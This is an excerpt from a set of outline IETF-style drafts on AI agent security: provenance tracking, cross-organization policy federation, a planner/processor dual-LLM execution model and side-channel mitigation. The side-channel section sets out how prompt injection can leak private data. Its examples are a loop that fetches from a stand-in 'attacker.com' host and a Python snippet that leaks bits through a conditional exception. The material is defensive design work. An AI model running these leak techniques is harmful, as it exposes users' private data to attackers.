]
|
||||
},
|
||||
"explain:trust_assessment": "UNTRUSTED — depends on quarantined LLM extraction from tool output",
|
||||
"explain:timestamp": "2026-03-09T14:30:05Z"
|
||||
}
|
||||
```
|
||||
|
||||
### 5.2 Streaming Provenance
|
||||
|
||||
For long-running agent tasks, provenance can be streamed:
|
||||
|
||||
- SSE (Server-Sent Events) or WebSocket connection
|
||||
- Each tool invocation emits a provenance event
|
||||
- Operators see the dependency graph build in real time
|
||||
|
||||
## 6. Privacy-Preserving Provenance
|
||||
|
||||
*Addresses Gap #93: Privacy-preserving agent-to-agent communication.*
|
||||
|
||||
### 6.1 The Provenance Privacy Paradox
|
||||
|
||||
Provenance metadata can itself leak sensitive information:
|
||||
|
||||
- Knowing *which tools were called* reveals the user's intent
|
||||
- Knowing *inner sources* (e.g., email senders) reveals the user's contacts
|
||||
- The transformation chain reveals the agent's reasoning process
|
||||
|
||||
### 6.2 Privacy Controls
|
||||
|
||||
1. **Selective disclosure**: agents can share provenance summaries (trust level, origin type) without full chains
|
||||
2. **Zero-knowledge trust**: "this value is trusted" attested by a trusted third party, without revealing the full provenance
|
||||
3. **Provenance redaction**: when crossing privacy boundaries, inner sources are replaced with attestations
|
||||
4. **Need-to-know**: provenance detail levels based on the requester's authorization
|
||||
|
||||
```json
|
||||
{
|
||||
"prov:origin": {
|
||||
"type": "attested",
|
||||
"attestor": "org1.example",
|
||||
"trust_level": "trusted",
|
||||
"detail": "redacted — contact org1.example for full provenance"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## 7. Relationship to ECT
|
||||
|
||||
Execution Context Tokens (draft-nennemann-wimse-ect) record *what happened* in a DAG of signed tokens. Provenance tracking records *where data came from*. They are complementary:
|
||||
|
||||
| Aspect | ECT | This Draft |
|
||||
|--------|-----|-----------|
|
||||
| **Tracks** | Task execution events | Data origin and flow |
|
||||
| **Granularity** | Per-task | Per-value |
|
||||
| **Format** | JWT with DAG links | JSON provenance records |
|
||||
| **Purpose** | Audit "what was done" | Explain "why this data" |
|
||||
|
||||
Integration: ECT claims can reference provenance records, and provenance records can link to ECT task IDs.
|
||||
|
||||
## 8. Security Considerations
|
||||
|
||||
- Provenance records must be integrity-protected (signed by the producing agent)
|
||||
- Provenance forgery (claiming a higher trust level) must be detectable via attestation chains
|
||||
- Provenance metadata size can be significant — compaction mechanisms are essential
|
||||
- Timing information in provenance can leak operational patterns
|
||||
|
||||
## 9. Open Questions
|
||||
|
||||
1. **Standard vocabulary**: should provenance types be extensible or fixed?
|
||||
2. **Cross-standard alignment**: how does this relate to W3C PROV (provenance ontology)?
|
||||
3. **Storage**: who is responsible for storing provenance long-term? Each agent? A shared ledger?
|
||||
4. **Legal implications**: does provenance tracking create liability for organizations that produce it?
|
||||
|
||||
## 10. References
|
||||
|
||||
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
|
||||
- Denning. "A lattice model of secure information flow." CACM, 1976.
|
||||
- W3C PROV: Provenance Data Model. W3C Recommendation, 2013.
|
||||
- draft-nennemann-wimse-ect (Execution Context Tokens)
|
||||
- draft-ietf-wimse-arch (WIMSE architecture)
|
||||
@@ -0,0 +1,300 @@
|
||||
---
|
||||
title: "Security Policy Negotiation and Federation for AI Agent Ecosystems"
|
||||
draft_name: draft-nennemann-ai-agent-policy-federation-00
|
||||
intended_wg: SECDISPATCH or OAUTH
|
||||
status: outline
|
||||
gaps_addressed: [83, 87, 90]
|
||||
camel_sections: [5.2, 9.1]
|
||||
date: 2026-03-09
|
||||
---
|
||||
|
||||
# Security Policy Negotiation and Federation for AI Agent Ecosystems
|
||||
|
||||
## 1. Problem Statement
|
||||
|
||||
CaML demonstrates that security policies — rules governing what data can flow to which tools — are essential for safe AI agent operation. However, CaML defines policies at the **single engine level**. In real multi-organization agent ecosystems:
|
||||
|
||||
- **Different organizations have different policies** (Gap #83): Org A's email policy may allow sharing with partners; Org B's may not
|
||||
- **Identity and trust models differ across domains** (Gap #87): IoT, web, telecom, and industrial agents use incompatible authentication mechanisms
|
||||
- **Agents cannot discover each other's capabilities or constraints** (Gap #90): when agents collaborate, they have no standard way to negotiate what data flows are permitted
|
||||
|
||||
This creates a fragmented security landscape where agents either over-restrict (breaking utility) or under-restrict (creating vulnerabilities).
|
||||
|
||||
## 2. Scope
|
||||
|
||||
This document defines:
|
||||
|
||||
1. A **policy publication format** for organizations to declare their agent security policies
|
||||
2. A **policy negotiation protocol** for agents to agree on data handling rules before collaboration
|
||||
3. A **policy federation framework** for resolving conflicts between policies from different trust domains
|
||||
4. **Liability attribution** based on policy decisions
|
||||
|
||||
## 3. Policy Publication
|
||||
|
||||
### 3.1 Organization Policy Document
|
||||
|
||||
Organizations publish their agent security policies at a well-known endpoint:
|
||||
|
||||
```
|
||||
GET /.well-known/ai-agent-policies HTTP/1.1
|
||||
Host: org1.example
|
||||
```
|
||||
|
||||
Response:
|
||||
|
||||
```json
|
||||
{
|
||||
"policies:version": "1.0",
|
||||
"policies:org": "org1.example",
|
||||
"policies:effective_date": "2026-01-01",
|
||||
"policies:tools": {
|
||||
"send_email": {
|
||||
"policy_ref": "https://org1.example/policies/send-email-v2",
|
||||
"summary": "Recipients must be in readers set or user-approved",
|
||||
"strictness": "high"
|
||||
},
|
||||
"cloud_storage_read": {
|
||||
"policy_ref": "https://org1.example/policies/storage-read-v1",
|
||||
"summary": "Outputs tagged with document access list as readers",
|
||||
"strictness": "medium"
|
||||
}
|
||||
},
|
||||
"policies:global_rules": [
|
||||
{
|
||||
"rule": "no_pii_to_external",
|
||||
"description": "PII-classified data never flows to tools hosted outside org1.example",
|
||||
"enforcement": "mandatory"
|
||||
}
|
||||
],
|
||||
"policies:trust_domains": [
|
||||
{
|
||||
"domain": "org2.example",
|
||||
"trust_level": "partner",
|
||||
"policy_overrides": []
|
||||
}
|
||||
],
|
||||
"policies:signature": "<signed by org1.example>"
|
||||
}
|
||||
```
|
||||
|
||||
### 3.2 Policy Detail Document
|
||||
|
||||
Each referenced policy provides full enforcement rules:
|
||||
|
||||
```json
|
||||
{
|
||||
"policy:id": "send-email-v2",
|
||||
"policy:tool": "send_email",
|
||||
"policy:version": "2.0",
|
||||
"policy:rules": [
|
||||
{
|
||||
"id": "r1",
|
||||
"check": "readers_include_recipient",
|
||||
"on_fail": "deny_with_user_prompt",
|
||||
"exceptions": [
|
||||
{
|
||||
"condition": "recipient_domain == org1.example",
|
||||
"action": "allow",
|
||||
"rationale": "Internal recipients always allowed"
|
||||
}
|
||||
]
|
||||
}
|
||||
],
|
||||
"policy:required_capabilities": ["cap:source_tracking", "cap:reader_labels"],
|
||||
"policy:compatible_with": ["camel-v1", "progent-v1"]
|
||||
}
|
||||
```
|
||||
|
||||
## 4. Policy Negotiation Protocol
|
||||
|
||||
### 4.1 Pre-Collaboration Handshake
|
||||
|
||||
Before two agents exchange data, they negotiate compatible policies:
|
||||
|
||||
```
|
||||
Agent A (org1.example) Agent B (org2.example)
|
||||
│ │
|
||||
│──── PolicyOffer ──────────────► │
|
||||
│ {my_policies, required_caps} │
|
||||
│ │
|
||||
│◄──── PolicyResponse ────────── │
|
||||
│ {your_policies, compatible, │
|
||||
│ proposed_merged_policy} │
|
||||
│ │
|
||||
│──── PolicyAccept/Reject ──────► │
|
||||
│ {accepted_policy_id} │
|
||||
│ │
|
||||
│◄═══ Data exchange begins ═════► │
|
||||
```
|
||||
|
||||
### 4.2 Policy Compatibility Check
|
||||
|
||||
Two policies are compatible if:
|
||||
|
||||
1. Both support the required capability types (provenance, readers, etc.)
|
||||
2. No mandatory rules from either side are contradicted
|
||||
3. The intersection of allowed data flows is non-empty (some useful work can be done)
|
||||
|
||||
### 4.3 Merged Policy
|
||||
|
||||
When policies differ, the negotiation produces a **merged policy**:
|
||||
|
||||
```json
|
||||
{
|
||||
"merged_policy:id": "merged-a1b2",
|
||||
"merged_policy:participants": ["org1.example", "org2.example"],
|
||||
"merged_policy:rules": [
|
||||
{
|
||||
"source": "org1.example",
|
||||
"rule": "no_pii_to_external",
|
||||
"enforcement": "mandatory",
|
||||
"applies_to": "data originating from org1"
|
||||
},
|
||||
{
|
||||
"source": "org2.example",
|
||||
"rule": "recipients_must_be_authenticated",
|
||||
"enforcement": "mandatory",
|
||||
"applies_to": "data originating from org2"
|
||||
}
|
||||
],
|
||||
"merged_policy:conflict_resolution": "most_restrictive_wins",
|
||||
"merged_policy:valid_until": "2026-03-09T15:30:00Z"
|
||||
}
|
||||
```
|
||||
|
||||
## 5. Policy Federation Framework
|
||||
|
||||
### 5.1 Conflict Resolution Strategies
|
||||
|
||||
| Strategy | Description | Use Case |
|
||||
|----------|-------------|----------|
|
||||
| `most_restrictive_wins` | Apply the stricter of conflicting rules | Default for cross-org |
|
||||
| `origin_policy_governs` | Data follows the policy of the org that produced it | Data sovereignty |
|
||||
| `destination_policy_governs` | Receiving org's policy applies | Regulatory compliance |
|
||||
| `explicit_consent` | User must approve any flow that either policy would restrict | High-security |
|
||||
| `arbiter_decides` | Trusted third party resolves conflicts | Multi-party disputes |
|
||||
|
||||
### 5.2 Trust Domain Mapping
|
||||
|
||||
*Addresses Gap #87: Cross-domain identity federation.*
|
||||
|
||||
Different domains use different identity systems. The federation framework provides translation:
|
||||
|
||||
```json
|
||||
{
|
||||
"trust_mapping:version": "1.0",
|
||||
"trust_mapping:domains": {
|
||||
"web": {
|
||||
"identity_type": "oauth2_client_id",
|
||||
"reader_format": "email",
|
||||
"example": "user@org1.example"
|
||||
},
|
||||
"iot": {
|
||||
"identity_type": "x509_device_cert",
|
||||
"reader_format": "device_uri",
|
||||
"example": "urn:device:sensor-42"
|
||||
},
|
||||
"telecom": {
|
||||
"identity_type": "sim_identity",
|
||||
"reader_format": "msisdn",
|
||||
"example": "+491234567890"
|
||||
}
|
||||
},
|
||||
"trust_mapping:equivalences": [
|
||||
{
|
||||
"assertion": "user@org1.example ≡ urn:device:sensor-42",
|
||||
"attested_by": "org1.example",
|
||||
"valid_until": "2026-12-31"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## 6. Liability Attribution
|
||||
|
||||
*Addresses Gap #83: Cross-organizational AI agent liability.*
|
||||
|
||||
### 6.1 Policy Decision Log
|
||||
|
||||
Every policy evaluation is logged with attribution:
|
||||
|
||||
```json
|
||||
{
|
||||
"liability:event_id": "evt-9c3a2d",
|
||||
"liability:action": "send_email",
|
||||
"liability:data_provenance": "prov-8c3a2d",
|
||||
"liability:policy_evaluated": "merged-a1b2",
|
||||
"liability:decision": "allowed",
|
||||
"liability:deciding_rule": {
|
||||
"source": "org1.example",
|
||||
"rule_id": "r1",
|
||||
"rationale": "Recipient in readers set per org1 policy"
|
||||
},
|
||||
"liability:responsible_party": "org1.example",
|
||||
"liability:timestamp": "2026-03-09T14:35:00Z"
|
||||
}
|
||||
```
|
||||
|
||||
### 6.2 Liability Chain
|
||||
|
||||
When harm occurs, the liability chain is traceable:
|
||||
|
||||
1. **Which policy allowed the action?** → the merged policy, specific rule
|
||||
2. **Which organization's rule was decisive?** → the `deciding_rule.source`
|
||||
3. **Was the policy correctly evaluated?** → compare logged capabilities against rule requirements
|
||||
4. **Was provenance accurate?** → verify provenance attestation signatures
|
||||
|
||||
### 6.3 Liability Models
|
||||
|
||||
| Model | Description | Applicability |
|
||||
|-------|-------------|---------------|
|
||||
| `origin_liable` | Org that produced the data is liable | Data quality issues |
|
||||
| `policy_owner_liable` | Org whose policy allowed the action is liable | Policy defects |
|
||||
| `executor_liable` | Agent that executed the tool is liable | Execution errors |
|
||||
| `shared_liability` | All participants share liability proportionally | Default for partnerships |
|
||||
| `insurance_model` | Pre-negotiated insurance covers harm | Enterprise deployments |
|
||||
|
||||
## 7. Integration with Capability Negotiation
|
||||
|
||||
*Addresses Gap #90: AI agent capability negotiation protocols.*
|
||||
|
||||
Policy federation naturally extends to capability negotiation:
|
||||
|
||||
```json
|
||||
{
|
||||
"capability_offer": {
|
||||
"agent_id": "agent-a@org1.example",
|
||||
"capabilities": [
|
||||
{"type": "email_send", "restrictions": ["org1.example domains only"]},
|
||||
{"type": "file_read", "restrictions": ["user-owned files only"]},
|
||||
{"type": "llm_query", "restrictions": ["no PII in prompts"]}
|
||||
],
|
||||
"required_from_peer": [
|
||||
{"type": "provenance_tracking", "min_version": "1.0"},
|
||||
{"type": "reader_labels", "min_version": "1.0"}
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## 8. Security Considerations
|
||||
|
||||
- Policy documents must be integrity-protected and versioned
|
||||
- Policy negotiation must be authenticated (mutual TLS, WIMSE tokens)
|
||||
- Cached policy decisions should be invalidated when policies change
|
||||
- Policy documents themselves can leak organizational security posture — access control on `/.well-known/ai-agent-policies` may be warranted
|
||||
|
||||
## 9. Open Questions
|
||||
|
||||
1. **Policy language expressiveness**: JSON rules vs. Rego/OPA vs. Python (CaML's approach) — standardize or allow pluggable?
|
||||
2. **Dynamic renegotiation**: can policies be renegotiated mid-conversation?
|
||||
3. **Regulatory mapping**: how do GDPR, CCPA, etc. map to policy rules?
|
||||
4. **Scalability**: with N organizations, policy negotiation is O(N²) — federation hierarchies?
|
||||
|
||||
## 10. References
|
||||
|
||||
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
|
||||
- RFC 9635 (GNAP: Grant Negotiation and Authorization Protocol)
|
||||
- RFC 6749 (OAuth 2.0 Authorization Framework)
|
||||
- draft-ietf-wimse-arch (WIMSE architecture)
|
||||
- Open Policy Agent (OPA) / Rego policy language
|
||||
@@ -0,0 +1,273 @@
|
||||
---
|
||||
title: "Privileged/Quarantined Execution Model for Agentic AI Systems"
|
||||
draft_name: draft-nennemann-ai-agent-dual-execution-00
|
||||
intended_wg: SECDISPATCH → new WG
|
||||
status: outline
|
||||
gaps_addressed: [89, 92, 94]
|
||||
camel_sections: [5.1]
|
||||
date: 2026-03-09
|
||||
---
|
||||
|
||||
# Privileged/Quarantined Execution Model for Agentic AI Systems
|
||||
|
||||
## 1. Problem Statement
|
||||
|
||||
Current AI agent architectures use a **single LLM** that simultaneously:
|
||||
|
||||
- Reads the user's trusted instructions
|
||||
- Processes untrusted external data (emails, web pages, documents)
|
||||
- Plans which tools to call
|
||||
- Decides what arguments to pass
|
||||
|
||||
This architectural conflation is the root cause of prompt injection vulnerabilities. An adversary who can influence the external data can influence the plan and the arguments — because the same model processes both.
|
||||
|
||||
CaML (Debenedetti et al., 2025) implements the first concrete **Dual-LLM architecture** where a Privileged LLM (P-LLM) handles planning and a Quarantined LLM (Q-LLM) handles untrusted data parsing, with strict isolation between them. This separation is analogous to kernel/user-space separation in operating systems.
|
||||
|
||||
No IETF standard defines roles, isolation requirements, or behavioral contracts for multi-component AI agent architectures.
|
||||
|
||||
## 2. Scope
|
||||
|
||||
This document defines:
|
||||
|
||||
1. **Execution roles** for AI agent components (Privileged, Quarantined, Orchestrator)
|
||||
2. **Isolation requirements** between roles
|
||||
3. **Behavioral contracts** specifying what each role can and cannot do
|
||||
4. **Communication channels** between roles with integrity guarantees
|
||||
5. A **role negotiation protocol** for multi-agent systems
|
||||
|
||||
## 3. Execution Roles
|
||||
|
||||
### 3.1 Role Definitions
|
||||
|
||||
| Role | CaML Term | Privileges | Restrictions |
|
||||
|------|-----------|-----------|-------------|
|
||||
| **Planner** | Privileged LLM (P-LLM) | Sees user query; generates execution plan; selects tools | Never sees tool outputs or external data content |
|
||||
| **Processor** | Quarantined LLM (Q-LLM) | Parses unstructured data into structured format | No tool access; cannot communicate arbitrary messages to Planner |
|
||||
| **Orchestrator** | CaML Interpreter | Executes plan; maintains data flow graph; enforces policies | Deterministic; no LLM reasoning |
|
||||
| **User** | Human | Approves policy violations; provides trusted input | — |
|
||||
|
||||
### 3.2 Role Isolation Matrix
|
||||
|
||||
```
|
||||
Can see: User Query Tool Outputs Plan External Data
|
||||
Planner ✓ ✗ ✓(own) ✗
|
||||
Processor ✗ ✗ ✗ ✓
|
||||
Orchestrator ✓ ✓ ✓ ✓(metadata only)
|
||||
User ✓ ✓ ✓ ✓
|
||||
```
|
||||
|
||||
Critical isolation: **The Planner never sees external data content. The Processor never has tool access.**
|
||||
|
||||
### 3.3 Communication Constraints
|
||||
|
||||
```
|
||||
User ──(trusted query)──► Planner
|
||||
Planner ──(plan code)──► Orchestrator
|
||||
Orchestrator ──(tool calls)──► Tools
|
||||
Tools ──(results)──► Orchestrator
|
||||
Orchestrator ──(structured data + schema)──► Processor
|
||||
Processor ──(structured output OR NotEnoughInfo)──► Orchestrator
|
||||
Orchestrator ──(error type only, no content)──► Planner [on error]
|
||||
```
|
||||
|
||||
The Processor can only communicate back:
|
||||
1. Structured data matching a Planner-specified schema (Pydantic-style)
|
||||
2. A `NotEnoughInformation` boolean signal (no free-text explanation — that would be an injection vector)
|
||||
|
||||
## 4. Behavioral Contracts
|
||||
|
||||
*Addresses Gap #94: AI agent behavioral specification languages.*
|
||||
|
||||
### 4.1 Contract Format
|
||||
|
||||
Each role has a formal behavioral contract:
|
||||
|
||||
```json
|
||||
{
|
||||
"contract:version": "1.0",
|
||||
"contract:role": "planner",
|
||||
"contract:invariants": [
|
||||
{
|
||||
"id": "inv-1",
|
||||
"description": "Planner never receives tool output content",
|
||||
"formal": "∀ step ∈ plan: planner.context ∩ tool_outputs = ∅",
|
||||
"enforcement": "orchestrator_enforced"
|
||||
},
|
||||
{
|
||||
"id": "inv-2",
|
||||
"description": "Plan is generated solely from user query and tool signatures",
|
||||
"formal": "plan = f(user_query, tool_signatures)",
|
||||
"enforcement": "architectural"
|
||||
},
|
||||
{
|
||||
"id": "inv-3",
|
||||
"description": "Planner output is deterministic code, not free-form text to tools",
|
||||
"formal": "planner.output ∈ restricted_python_subset",
|
||||
"enforcement": "parser_enforced"
|
||||
}
|
||||
],
|
||||
"contract:capabilities": [
|
||||
"generate_plan",
|
||||
"select_tools",
|
||||
"define_schemas_for_processor",
|
||||
"call_print_for_user_output"
|
||||
],
|
||||
"contract:prohibited": [
|
||||
"access_tool_outputs",
|
||||
"access_external_data",
|
||||
"communicate_with_processor_directly",
|
||||
"modify_orchestrator_state"
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### 4.2 Processor Contract
|
||||
|
||||
```json
|
||||
{
|
||||
"contract:version": "1.0",
|
||||
"contract:role": "processor",
|
||||
"contract:invariants": [
|
||||
{
|
||||
"id": "inv-1",
|
||||
"description": "Processor has no tool-calling capability",
|
||||
"formal": "processor.tools = ∅",
|
||||
"enforcement": "architectural"
|
||||
},
|
||||
{
|
||||
"id": "inv-2",
|
||||
"description": "Processor output conforms to Planner-specified schema",
|
||||
"formal": "processor.output ∈ schema(planner.request)",
|
||||
"enforcement": "schema_validation"
|
||||
},
|
||||
{
|
||||
"id": "inv-3",
|
||||
"description": "Processor cannot send free-text to Planner",
|
||||
"formal": "processor → planner: only {structured_data, NotEnoughInfo}",
|
||||
"enforcement": "orchestrator_enforced"
|
||||
}
|
||||
],
|
||||
"contract:capabilities": [
|
||||
"parse_unstructured_to_structured",
|
||||
"signal_insufficient_information"
|
||||
],
|
||||
"contract:prohibited": [
|
||||
"call_tools",
|
||||
"see_user_query",
|
||||
"send_arbitrary_text_to_planner",
|
||||
"access_other_tool_outputs"
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### 4.3 Contract Verification
|
||||
|
||||
Contracts can be verified at three levels:
|
||||
|
||||
1. **Architectural**: enforced by system design (Processor literally has no tool access)
|
||||
2. **Parser-enforced**: Planner output parsed and validated against restricted grammar
|
||||
3. **Runtime-monitored**: Orchestrator checks invariants at each step
|
||||
|
||||
## 5. Practical Considerations
|
||||
|
||||
### 5.1 Model Selection
|
||||
|
||||
CaML shows that the Processor role can use a **cheaper, weaker model**:
|
||||
|
||||
- P-LLM: Claude Sonnet, GPT-4o, o3 (needs strong reasoning)
|
||||
- Q-LLM: Claude Haiku, GPT-4o-mini (only needs structured extraction)
|
||||
|
||||
Using a local model for the Processor improves **privacy**: the P-LLM provider never sees tool outputs (which may contain sensitive data).
|
||||
|
||||
### 5.2 Error Handling
|
||||
|
||||
When the Processor encounters an error:
|
||||
|
||||
1. Processor signals `NotEnoughInformation` (boolean, no details)
|
||||
2. Orchestrator reports to Planner: error type + location (but **not** the data content)
|
||||
3. Planner generates alternative code
|
||||
4. Retry up to N times (CaML uses N=10)
|
||||
|
||||
Important: error messages from untrusted data must be **redacted** before reaching the Planner, as they could contain prompt injections.
|
||||
|
||||
### 5.3 Limitations
|
||||
|
||||
CaML identifies inherent limitations of the Dual-LLM pattern:
|
||||
|
||||
- **"Data requires action" failure**: when the required actions depend on untrusted data content, the Planner cannot plan without seeing the data
|
||||
- **Not enough context for Processor**: when the Processor needs information that wasn't passed to it, and cannot request it (that would be a communication channel)
|
||||
|
||||
## 6. Multi-Agent Role Mapping
|
||||
|
||||
*Addresses Gap #89: Adversarial AI agent detection in real-time.*
|
||||
|
||||
In multi-agent systems, each agent declares its role:
|
||||
|
||||
```json
|
||||
{
|
||||
"agent:id": "agent-a@org1.example",
|
||||
"agent:role_declaration": {
|
||||
"architecture": "dual_llm",
|
||||
"planner": {
|
||||
"model_family": "claude-sonnet",
|
||||
"contract_ref": "https://org1.example/contracts/planner-v2"
|
||||
},
|
||||
"processor": {
|
||||
"model_family": "claude-haiku",
|
||||
"contract_ref": "https://org1.example/contracts/processor-v1"
|
||||
},
|
||||
"orchestrator": {
|
||||
"type": "deterministic_interpreter",
|
||||
"contract_ref": "https://org1.example/contracts/orchestrator-v1"
|
||||
}
|
||||
},
|
||||
"agent:attestation": "<signed by org1.example>"
|
||||
}
|
||||
```
|
||||
|
||||
Peer agents can verify:
|
||||
- The counterpart uses a recognized execution model
|
||||
- Role contracts meet minimum security requirements
|
||||
- Attestations are valid and current
|
||||
|
||||
### 6.1 Detecting Adversarial Agents
|
||||
|
||||
An agent that violates its declared contracts can be detected by:
|
||||
|
||||
1. **Behavioral anomaly**: actions inconsistent with declared role contracts
|
||||
2. **Provenance inconsistency**: data claimed as "trusted" but provenance chain shows untrusted origins
|
||||
3. **Policy violation patterns**: repeated attempts to bypass policies suggest compromise
|
||||
|
||||
## 7. Ethical Conflict Resolution
|
||||
|
||||
*Partially addresses Gap #92: AI agent ethical decision conflict resolution.*
|
||||
|
||||
When agents with different ethical frameworks collaborate:
|
||||
|
||||
1. Each agent's Planner operates under its organization's ethical guidelines (encoded in its system prompt)
|
||||
2. The Orchestrator enforces policy-level ethical constraints
|
||||
3. When ethical conflicts arise at data exchange boundaries, the Policy Federation framework (Draft 4) handles resolution
|
||||
4. The execution model ensures ethical guidelines cannot be overridden by injected data
|
||||
|
||||
This is a partial solution — the execution model prevents **external manipulation** of ethical decisions, but does not resolve **genuine disagreements** between organizations' ethical frameworks.
|
||||
|
||||
## 8. Security Considerations
|
||||
|
||||
- Role isolation must be enforced architecturally, not just by prompting
|
||||
- The Orchestrator is the most critical component — if compromised, all guarantees fail
|
||||
- Model selection for Processor should consider adversarial robustness, not just capability
|
||||
- Role declarations should be verified, not just trusted
|
||||
|
||||
## 9. Open Questions
|
||||
|
||||
1. **Standardizing the restricted language**: CaML uses a Python subset. Should the standard mandate a specific language or allow alternatives?
|
||||
2. **Role granularity**: are Planner/Processor/Orchestrator sufficient, or do we need more fine-grained roles?
|
||||
3. **Recursive planning**: when a Planner needs to plan based on intermediate results, how to maintain isolation?
|
||||
4. **Multi-turn conversations**: how do roles work across conversation turns where context accumulates?
|
||||
|
||||
## 10. References
|
||||
|
||||
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
|
||||
- Willison. "The Dual LLM pattern for building AI assistants that can resist prompt injection." 2023.
|
||||
- Wu et al. "IsolateGPT: An Execution Isolation Architecture for LLM-Based Agentic Systems." NDSS, 2025.
|
||||
- Shi et al. "Progent: Programmable Privilege Control for LLM Agents." arXiv:2504.11703, 2025.
|
||||
@@ -0,0 +1,245 @@
|
||||
---
|
||||
title: "Side-Channel Mitigation Framework for AI Agent Interactions"
|
||||
draft_name: draft-nennemann-ai-agent-side-channels-00
|
||||
intended_wg: SECDISPATCH (BCP)
|
||||
status: outline
|
||||
gaps_addressed: [89, 93]
|
||||
camel_sections: [7]
|
||||
document_type: BCP (Best Current Practice)
|
||||
date: 2026-03-09
|
||||
---
|
||||
|
||||
# Side-Channel Mitigation Framework for AI Agent Interactions
|
||||
|
||||
## 1. Problem Statement
|
||||
|
||||
Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — **side-channel attacks** can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:
|
||||
|
||||
1. **External resource inference**: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
|
||||
2. **Exception-based bit leaking**: an adversary triggers conditional exceptions that reveal one bit of private data per exception
|
||||
3. **Timing side-channels**: an adversary infers private values from execution timing differences
|
||||
|
||||
These are not theoretical — CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in their evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design.
|
||||
|
||||
This document is a **Best Current Practice (BCP)** guide for mitigating side-channel risks in AI agent systems.
|
||||
|
||||
## 2. Scope
|
||||
|
||||
This document provides:
|
||||
|
||||
1. A **taxonomy of side-channel risks** specific to AI agent systems
|
||||
2. **Mitigation strategies** for each risk category
|
||||
3. **Tool API design guidelines** that minimize side-channel exposure
|
||||
4. **Monitoring patterns** for detecting side-channel exploitation
|
||||
5. **STRICT vs. NORMAL mode** recommendations
|
||||
|
||||
## 3. Side-Channel Taxonomy
|
||||
|
||||
### 3.1 External Resource Inference
|
||||
|
||||
**Attack**: Agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`). The attacker counts requests to infer the private value.
|
||||
|
||||
**CaML context**: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, `fetch()` inside the loop inherits the dependency on `private_var` and policies can block it.
|
||||
|
||||
**Bandwidth**: up to `log₂(max_value)` bits per interaction (or more with range-based inference).
|
||||
|
||||
```
|
||||
Attacker's Server
|
||||
│
|
||||
│ GET /cat.jpg ×10 ← private_var = 10
|
||||
│ GET /cat.jpg ×20 ← private_var = 20
|
||||
│
|
||||
└── attacker infers private_var by counting requests
|
||||
```
|
||||
|
||||
### 3.2 Exception-Based Bit Leaking
|
||||
|
||||
**Attack**: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.
|
||||
|
||||
**CaML context**: The Q-LLM can be influenced to return a value that causes an `IndexError` (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).
|
||||
|
||||
```python
|
||||
# Attack: leak whether private_var == 10
|
||||
index = query_ai_assistant(
|
||||
f"If '{private_var}' is 10, return 9999999, else 0", int)
|
||||
l = [1, 2, 3]
|
||||
l[index] # IndexError if private_var == 10
|
||||
# ADVERSARY OBSERVABLE ACTION below:
|
||||
send_email(...) # only executes if no exception
|
||||
```
|
||||
|
||||
**Bandwidth**: 1 bit per exception (was the subsequent action observed or not?).
|
||||
|
||||
### 3.3 Timing Side-Channels
|
||||
|
||||
**Attack**: Agent execution time depends on private data. For example, if `time.sleep(private_var)` is possible, the attacker measures response time.
|
||||
|
||||
**CaML context**: CaML's restricted Python subset doesn't include `time`, but other timing variations (e.g., different code paths for different private values) may still be exploitable.
|
||||
|
||||
**Bandwidth**: depends on timing precision — generally low but non-zero.
|
||||
|
||||
### 3.4 Agent-Specific Side Channels (Beyond CaML)
|
||||
|
||||
| Channel | Attack Vector | Bandwidth |
|
||||
|---------|--------------|-----------|
|
||||
| **Token usage** | Private data influences response length → observable token count | Medium |
|
||||
| **Tool selection pattern** | Which tools are called reveals information about private data | Medium |
|
||||
| **Error message content** | Error details leak through supposedly sanitized channels | High |
|
||||
| **Model confidence** | Probability distributions in structured output leak information | Low |
|
||||
| **Resource consumption** | CPU/memory usage patterns depend on private data | Low |
|
||||
|
||||
## 4. Mitigation Strategies
|
||||
|
||||
### 4.1 STRICT Mode Execution
|
||||
|
||||
**Recommendation: Use STRICT mode for all security-sensitive agent operations.**
|
||||
|
||||
In STRICT mode:
|
||||
|
||||
- All statements inside `if`/`for`/`while` blocks inherit dependencies from the condition/iterator
|
||||
- This means a `fetch()` inside `for i in range(private_var)` will have `private_var` in its dependency graph
|
||||
- Security policies can detect and block the side-channel
|
||||
|
||||
**Trade-off**: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, allow NORMAL mode only for explicitly low-sensitivity operations.
|
||||
|
||||
### 4.2 Exception Handling Hardening
|
||||
|
||||
**Recommendation: Use error-value types instead of exceptions for data-dependent operations.**
|
||||
|
||||
Exceptions create side channels because they halt execution. Instead:
|
||||
|
||||
```python
|
||||
# VULNERABLE: exception leaks information
|
||||
try:
|
||||
result = risky_operation(private_data)
|
||||
send_email(result) # not reached if exception
|
||||
except:
|
||||
pass # attacker observes: was email sent?
|
||||
|
||||
# MITIGATED: error-value preserves execution flow
|
||||
result = risky_operation(private_data) # returns Result type
|
||||
if result.is_ok():
|
||||
send_email(result.value) # both branches execute deterministically
|
||||
else:
|
||||
send_email(default_value) # same tool call either way
|
||||
```
|
||||
|
||||
Agent frameworks SHOULD:
|
||||
- Use `Result`/`Either` types instead of exceptions for Processor outputs
|
||||
- Ensure both success and failure paths make the same external observations
|
||||
- Redact exception messages before they reach the Planner
|
||||
|
||||
### 4.3 Constant-Pattern Tool Calls
|
||||
|
||||
